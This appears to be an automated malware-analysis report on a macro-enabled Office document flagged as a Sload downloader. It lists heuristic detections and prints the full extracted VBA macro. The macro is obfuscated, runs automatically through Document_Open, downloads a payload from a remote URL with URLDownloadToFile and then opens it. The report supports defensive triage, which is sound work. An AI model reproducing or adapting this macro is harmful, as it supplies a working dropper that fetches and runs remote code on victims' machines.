Verdict: MALICIOUS (Risk Score: 300)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is a Microsoft Office document containing VBA macros. The Document_Open macro is configured to execute automatically and uses the URLDownloadToFile API to download a payload from a remote source. This indicates downloader functionality, typical of many malware families.
Heuristics (10)

- ClamAV: Doc.Downloader.Sload-6961205-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `Private LFV2KDB As Integer Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Function YaNdjoVzN3ap(f7wxbf0A) As Object Set YaNdjoVzN3ap = CreateObject(f7wxbf0A) End Function`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: ``Public apMCG7qCfEkS09 Sub Document_Open() apMCG7qCfEkS09 = Array(UdSk9gRq("T", "u"), BZCHDKP7vG("I", ":"), TPxUhQKxfR("E", "B"), OwtR0c("w", "z"), KpQtwv("M", "."), ONbBnc82h("Y", "-"), Q2Ik84jGxG7pB("P", "h"), wzi6wxCG("G", "V"), uvCsd3maa("S46QhkhX", "e8M>l2=?l"), zZUGmE0J5("/`X.QRFA", "y_IpKvPpA"), yEkGXN90q(")0ltq>i-", "c~cOK9ae|"), Qj4LrHW12xSvw(">tz{Hi7k", "3oy:>nI\."), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"))``
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `Function KRjbeyxU5(psRe0ioiT8k) As String KRjbeyxU5 = Environ(psRe0ioiT8k) End Function`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8144 bytes |

SHA-256: c51f27b6fd7b7e833a1d4eafa17f88152c6d963fd563ceaf429ee055c7c48b36

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 83 of 157 identifiers look randomly generated (e.g. 'kV5Bo5GtMNBihnIlI11'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If 1 And VBA7 And Win64 And 1 And 1 And 1 Then
Private j0Gjo As Integer
Private LFV2KDB As Integer
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _
ByVal Ossoj As String, _
ByVal XD9c87O0F As String, _
ByVal Z7V7Pgy51I As Long, _
ByVal AUO4Fa0MOL7N As Long) As LongPtr
Private u4o1LPC6n As Integer
Private rDiMoDYHMJraij2p5N As Integer
#Else
Private j0Gjo As Integer
Private CI8GfiRNS512G As Integer
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _
ByVal Ossoj As String, _
ByVal XD9c87O0F As String, _
ByVal Z7V7Pgy51I As Long, _
ByVal AUO4Fa0MOL7N As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal eS5eq As String, ByVal U59M0 As Long, ByVal rBrgpmGi As String, ByVal w8TISx As String, ByVal ZavrRTW As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal esiFTISNiQI As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal vOMCv49 As Long, ByVal FcOZBLLz75GYEitUD As String, ByVal J9QLToKE As Long, iBM4bMeriBr75gNt As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal UBM79C As Long, ByVal Z2u8tldnln3KT9zuWjb As String, ByVal hWW1M8c As String, ByVal mWrISD As Long, ByVal nbJATStDuQ4 As Long, ByVal TDDuZedW As Long) As Long
Private Rg31XzHy6wT As Integer
#End If
Public apMCG7qCfEkS09
Sub Document_Open()
apMCG7qCfEkS09 = Array(UdSk9gRq("T", "u"), BZCHDKP7vG("I", ":"), TPxUhQKxfR("E", "B"), OwtR0c("w", "z"), KpQtwv("M", "."), ONbBnc82h("Y", "-"), Q2Ik84jGxG7pB("P", "h"), wzi6wxCG("G", "V"), uvCsd3maa("S46QhkhX", "e8M>l2=?l"), zZUGmE0J5("/`X.QRFA", "y_IpKvPpA"), yEkGXN90q(")0ltq>i-", "c~cOK9ae|"), Qj4LrHW12xSvw(">tz{Hi7k", "3oy:>nI\."), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"))
CvfELQmBq
End Sub
Sub CvfELQmBq()
Dim mylr1uNRhO17E9t
Dim CrPI5
Dim MphJk1 As String
CrPI5 = Array(nqVK0pvp(lW5zf0E8KMn()), nqVK0pvp("\,e)wOiVwdCOzDeno-FTo{rn./>MeWB[xbXBe2UO"), nqVK0pvp("hJFvt}++tsR+pP3g:GdS/B_2/h1fgc-ke@<WtqXYt32DhI?CemAvceWPhY|Uo.>okls\ek,?.Ye@c2enoS*xmPD)/K}M.8TEt;+Ye=20m>9}pf,d/|G.i,oXn+b[d/:UeW0_xSa@/J\Gj>W(oeC[j7sSopk|.<S{ezG5xs5pei4p"), nqVK0pvp(EQbmW5J1vSiv()))
Dim FFl421uq2jiHj7
Set FFl421uq2jiHj7 = YaNdjoVzN3ap(CrPI5(599 - (2688) + (2092)))
MphJk1 = KRjbeyxU5(CrPI5(-7476 - (2449) + (9925))) + CrPI5(-6348 - (2894) + (9243))
Call URLDownloadToFile(nqVK0pvp(Yx3UU8zD()), CrPI5(-2192 - (-4002) + (-1808)), MphJk1, nqVK0pvp(Yx3UU8zD()), nqVK0pvp(Yx3UU8zD()))
FFl421uq2jiHj7.Open (MphJk1)
End Sub
Function nqVK0pvp(kMzYMBkzV9nR) As String
Dim zv3Yd5DgrewzK1(-3068 - (5538) + (9661)) As Byte
Dim UwHS6() As Byte
Dim zf7fdL0CN6AUZfB5
Dim Rl9ffoYN7
UwHS6 = StrConv(kMzYMBkzV9nR, (-8833 - (-3983) + (4978)))
For Rl9ffoYN7 = 0 To UBound(UwHS6) - 1
If (Rl9ffoYN7 Mod 4 = (-6203 - (-8485) + (-2282))) Then
zv3Yd5DgrewzK1(zf7fdL0CN6AUZfB5) = UwHS6(Rl9ffoYN7)
zf7fdL0CN6AUZfB5 = zf7fdL0CN6AUZfB5 + 1
End If
Next Rl9ffoYN7
nqVK0pvp = Left(StrConv(zv3Yd5DgrewzK1, (2312 - (7435) + (5187))), zf7fdL0CN6AUZfB5)
End Function
Function lW5zf0E8KMn() As String
Dim BgsL5RFBkRsFQCd
Dim spahANJ8v3A7mQB6jY
Dim WHJK20iENvjDBLw2nyy
Dim fwkjYxHvKTlYL
Dim ruvJYnZzvzOOi
Dim soBjcD83blYlMk5
Dim OkcMO4VR1jFAO
Dim g1lK9FP68j
BgsL5RFBkRsFQCd = apMCG7qCfEkS09(-7476 - (2449) + (9925))
spahANJ8v3A7mQB6jY = BgsL5RFBkRsFQCd & apMCG7qCfEkS09(-6348 - (2894) + (9243))
WHJK20iENvjDBLw2nyy = spahANJ8v3A7mQB6jY & apMCG7qCfEkS09(-2192 - (-4002) + (-1808))
fwkjYxHvKTlYL = WHJK20iENvjDBLw2nyy & apMCG7qCfEkS09(599 - (2688) + (2092))
ruvJYnZzvzOOi = fwkjYxHvKTlYL & apMCG7qCfEkS09(-1407 - (7793) + (9204))
soBjcD83blYlMk5 = ruvJYnZzvzOOi & apMCG7qCfEkS09(1754 - (-1486) + (-3235))
OkcMO4VR1jFAO = soBjcD83blYlMk5 & apMCG7qCfEkS09(1067 - (-6052) + (-7113))
g1lK9FP68j = OkcMO4VR1jFAO & apMCG7qCfEkS09(10776 - (9255) + (-1514))
lW5zf0E8KMn = g1lK9FP68j
End Function
Function EQbmW5J1vSiv() As String
Dim JC548
Dim NYB2UbAM2zdMNA0M2
Dim kNa0Db7KyF0T0CyQJdB
Dim Du4qOI9b2
JC548 = apMCG7qCfEkS09(724 - (-3930) + (-4646))
NYB2UbAM2zdMNA0M2 = JC548 & apMCG7qCfEkS09(-20 - (7620) + (7649))
kNa0Db7KyF0T0CyQJdB = NYB2UbAM2zdMNA0M2 & apMCG7qCfEkS09(4899 - (-2530) + (-7419))
Du4qOI9b2 = kNa0Db7KyF0T0CyQJdB & apMCG7qCfEkS09(-6080 - (3869) + (9960))
EQbmW5J1vSiv = Du4qOI9b2
End Function
Function Yx3UU8zD() As String
Dim jyjmJSiU7Aw3hVMAt
Dim ufw4WpIupIkcuSVI
jyjmJSiU7Aw3hVMAt = apMCG7qCfEkS09(1124 - (2301) + (1189))
ufw4WpIupIkcuSVI = jyjmJSiU7Aw3hVMAt & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
Yx3UU8zD = ufw4WpIupIkcuSVI
End Function
Function gPTK7NuexkWx() As String
Dim FHHggjGwBTE
Dim lPigUFMw6fRu
FHHggjGwBTE = apMCG7qCfEkS09(1124 - (2301) + (1189))
lPigUFMw6fRu = FHHggjGwBTE & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
gPTK7NuexkWx = lPigUFMw6fRu
End Function
Function vo4bGe1A() As String
Dim UPcPjVFUXPF4sCL3O0
Dim s2aHTQa47e5ZB
UPcPjVFUXPF4sCL3O0 = apMCG7qCfEkS09(1124 - (2301) + (1189))
s2aHTQa47e5ZB = UPcPjVFUXPF4sCL3O0 & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
vo4bGe1A = s2aHTQa47e5ZB
End Function
Function UdSk9gRq(OOZcHdohepYHd As String, TBu6yxjDVGfDpcMow4w As String)
UdSk9gRq = OOZcHdohepYHd + TBu6yxjDVGfDpcMow4w
End Function
Function BZCHDKP7vG(GbsPUepW9b7zO7Z5nNc As String, F5s8uOS1RshkbDO As String)
BZCHDKP7vG = GbsPUepW9b7zO7Z5nNc + F5s8uOS1RshkbDO
End Function
Function TPxUhQKxfR(rIVcK7C4u8fp As String, i2H0ZSnq8i As String)
TPxUhQKxfR = rIVcK7C4u8fp + i2H0ZSnq8i
End Function
Function OwtR0c(kV5Bo5GtMNBihnIlI11 As String, zzEZky As String)
OwtR0c = kV5Bo5GtMNBihnIlI11 + zzEZky
End Function
Function KpQtwv(As8IoMG8Yz As String, W8J7n0mIezKUin9l As String)
KpQtwv = As8IoMG8Yz + W8J7n0mIezKUin9l
End Function
Function ONbBnc82h(p7kkHWRpvNl3YoSZEIE As String, StDyD As String)
ONbBnc82h = p7kkHWRpvNl3YoSZEIE + StDyD
End Function
Function Q2Ik84jGxG7pB(vvkef9K93X8Oni0hUC As String, PEijpXlFQYz As String)
Q2Ik84jGxG7pB = vvkef9K93X8Oni0hUC + PEijpXlFQYz
End Function
Function wzi6wxCG(YtmXLagBFEQuVHJ As String, BRZESEhnjVC5DsQ As String)
wzi6wxCG = YtmXLagBFEQuVHJ + BRZESEhnjVC5DsQ
End Function
Function uvCsd3maa(jm90bFbGNQ0JxBo As String, nDYEZoqKWoE5329UTIo As String)
uvCsd3maa = jm90bFbGNQ0JxBo + nDYEZoqKWoE5329UTIo
End Function
Function zZUGmE0J5(UelVf As String, OACoSvkcuh As String)
zZUGmE0J5 = UelVf + OACoSvkcuh
End Function
Function yEkGXN90q(yXzJctRcBN9YEDv As String, X08h92is90deW4 As String)
yEkGXN90q = yXzJctRcBN9YEDv + X08h92is90deW4
End Function
Function Qj4LrHW12xSvw(sTT8KBwUzCbC8JIu0wy As String, suuculfFfpIz As String)
Qj4LrHW12xSvw = sTT8KBwUzCbC8JIu0wy + suuculfFfpIz
End Function
Function OCvZI4(EvXJtfQt2y31w5xt As String, OaF0gfd9yrYM As String)
OCvZI4 = EvXJtfQt2y31w5xt + OaF0gfd9yrYM
End Function
Function XWRCxiqtMb(evHegCMHb As String, kFZ2wtrsfpnm As String)
XWRCxiqtMb = evHegCMHb + kFZ2wtrsfpnm
End Function
Function qcpJJZeKALh(r5aIIZH As String, NK263E7gOLjjgHOB0 As String)
qcpJJZeKALh = r5aIIZH + NK263E7gOLjjgHOB0
End Function
Function TjkrSv7gL6(QdjkI5B As String, jZs4C4Ounz As String)
TjkrSv7gL6 = QdjkI5B + jZs4C4Ounz
End Function
Function oe2yRkFSV(DfM8VnoDT As String, Xw67UStZrf As String)
oe2yRkFSV = DfM8VnoDT + Xw67UStZrf
End Function
Function wfdYl3WS(pX5EqNUM3UJxpvg4ip As String, rupuXoYFdRNbJUW As String)
wfdYl3WS = pX5EqNUM3UJxpvg4ip + rupuXoYFdRNbJUW
End Function
Function YaNdjoVzN3ap(f7wxbf0A) As Object
Set YaNdjoVzN3ap = CreateObject(f7wxbf0A)
End Function
Function KRjbeyxU5(psRe0ioiT8k) As String
KRjbeyxU5 = Environ(psRe0ioiT8k)
End Function
```